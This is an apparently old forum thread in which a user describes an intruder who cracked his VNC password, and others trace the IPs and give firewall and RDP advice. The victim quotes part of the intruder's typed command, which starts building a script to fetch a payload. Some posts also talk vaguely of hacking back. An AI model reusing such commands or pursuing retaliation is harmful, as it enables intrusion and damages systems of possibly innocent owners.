Repeated hacking attempts

[Hired_goon]

Long story short.

SInce storms last week broadband line is down.
Using dialup at the moment.
Using internet connection sharing to allow the missus access as well.

To allow her to access internet I have to reduce firewall settings to medium.

WHile on this setting some little bastard has cracked my VNC password and in the middle of my doing something the run dialog appears and tries to type shit like

cmd.exe /c del i&echo open 127.0.0.1 33405 > i&echo[/b]

That was all he typed before I cut him off. Had other similar ones that I didn't record.

Now I have changed my VNC password and forced the access permissions to prompt me.

But, windows event viewer does a real fine job of recording the IP of each access attempt, however a trace shows no RDNS for each IP.(different each time.)

SO, my question is, with no RDNS is it likely to be proxied or spoofed?

Would really like to fuck this guy up but am I wasting my time trying?

Anybody got any good tracing tool recommendations? Currently using sam spade.

Yea, I know, VNC sucks but in a house of five computers and one couch potato, it's damn handy.

SUggestions???

[TYSON]

post the ip's

[Hired_goon]

post the ip's[/b]

124.60.175.69
220.89.37.42
218.49.10.108

These are the three from today.

[TYSON]

124.60.175.69
remarks: This address space is assigned at various other places in
remarks: the world and might therefore not be in the RIPE database

220.89.37.42
remarks: This address space is assigned at various other places in
remarks: the world and might therefore not be in the RIPE database

218.49.10.108
remarks: This address space is assigned at various other places in
remarks: the world and might therefore not be in the RIPE database[/b]

Judging by this http://www.google.com/search?hl=en&saf...amp;btnG=Search

My guess is china

[Hired_goon]

Cheers Tyson, pretty much the same brick wall I came up with.

Just want to know if he's malicious or gonna load some porn on my comp for me free of charge.

[D'Artagnan]

Stoofed IP's. best bet is force an ip change and do something about firewall. Got a spare dual port dialup router if you want? ICS sucks.

[Hired_goon]

Stoofed IP's. best bet is force an ip change and do something about firewall. Got a spare dual port dialup router if you want? ICS sucks.[/b]

Thanks Nessross, got plenty of gear to secure, just want my broadband back so I can get back to normal. Damn Telstra needs to do some recabling. Friday should be the day.

Latest IP is 201.75.136.117 while I was out having a swim. Ahhh, feel cooler now. lol

[Absent-minded]

www.astalavista.com you can get some good programs from there, and some ones that will, umm rape? the hacker basically backlashing them corrupting their HDD n shiznit

[Pkunk]

i hope you are using a password that isnt suseptible to a dictionary/brute force attack...

[Absent-minded]

i hope you are using a password that isnt suseptible to a dictionary/brute force attack...[/b]

Brute force like a brick by any chance?

[thro]

Suggestion? Block everything, open up what you need, and be selective abuot where you allow those connections to come from.

If you'd done that, the kiddie would have never even been able to connect to your VNC in the first place....


However, as said, firewall on the machine you're trying to protect is false security - all it needs is for some virus/trojan to be accidentally downloaded that turns firewalling off or modifies the rules, etc and you're back to being insecure, get a router if you can


And yeah... brute force = just guessing every possible password.... ALL passwords are susceptible to brute force... eventually, unless they start dropping failed connections and locking out logins....

[Klink]

What version of windows are you running?

If its XP... get rid of windows firewall. Im sorry but that is a piece of shit.
If its XP... get rid of VNC and use Remote Desktop Connection.

If its not XP... get with the times

[Hired_goon]

What version of windows are you running?

If its XP... get rid of windows firewall. Im sorry but that is a piece of shit.
If its XP... get rid of VNC and use Remote Desktop Connection.

If its not XP... get with the times [/b]

XP firewall dumped on day one
Still got one win2k machine on my network so VNC still useful.

And yes, the password was too easy but never had a problem before.All fixed now. It's just since my broadband is down. Normally between the adsl modems firewall and local firewalls on everey machine then there isn't much that can get through.

The only problem is I can't seem to get my local firewall to allow access to the net using ICS without relaxing the settings a bit.

Any Telstra people out there??? I WANT MY BLOODY PHONE LINE BACK!!!!!!!

[DaveR6]

VNC is great. why is remote desktop anymore secure...especially if VNC is using your windows logon to authenticate?

sounds like VNC bashing from those who dont understand how to configure it securely.

[TYSON]

VNC is great. why is remote desktop anymore secure...especially if VNC is using your windows logon to authenticate?

sounds like VNC bashing from those who dont understand how to configure it securely.[/b]

any port open to the internet is a risk, correct configuration wont save you from an exploit, and looking at all the sploits that have been available for it i wouldnt leave it open.

[Klink]

VNC is great. why is remote desktop anymore secure...especially if VNC is using your windows logon to authenticate?

sounds like VNC bashing from those who dont understand how to configure it securely.[/b]

LOL

I didnt say it was insecure... I think its horrible
Its called an opinion.

Nothing is 100% secure.

[D'Artagnan]

While RDP is 'fixed' to 3389 it's compromised. Personally I think it looks better than VNC but I use VNC when working on remote sites, simply because of the increased security. Oh and I use UVnc SC http://www.uvnc.com/pchelpware/sc/index.html which not only allows custom encyption, but reduces the risk of breaches by being remote initiated. Not ideal for all, but better for me. What does this mean? Well, Joe Blow has an issue, I send him a file (pre-configured exe) which he runs. I then gain control of his PC. He can end it whenever and he has to initiate the connection. Only the port I want to open and it can't connect to anything but me.

Nessross

[Klink]

RDP's port number can be changed by:

1. Start Registry Editor.
2. Locate and then click the following registry subkey:
   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l\TerminalServer\WinStations\RDP-Tcp\PortNumber
3. On the Edit menu, click Modify, and then click Decimal.
4. Type the new port number, and then click OK.
5. Quit Registry Editor.

[D'Artagnan]

Well there you go..really should have checked that, but it's been so long since I've needed to.

[Desmo]

RDP's port number can be changed by:

1. Start Registry Editor.
2. Locate and then click the following registry subkey:
   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l\TerminalServer\WinStations\RDP-Tcp\PortNumber
3. On the Edit menu, click Modify, and then click Decimal.
4. Type the new port number, and then click OK.
5. Quit Registry Editor.

[/b]

Just don't set it to port 80....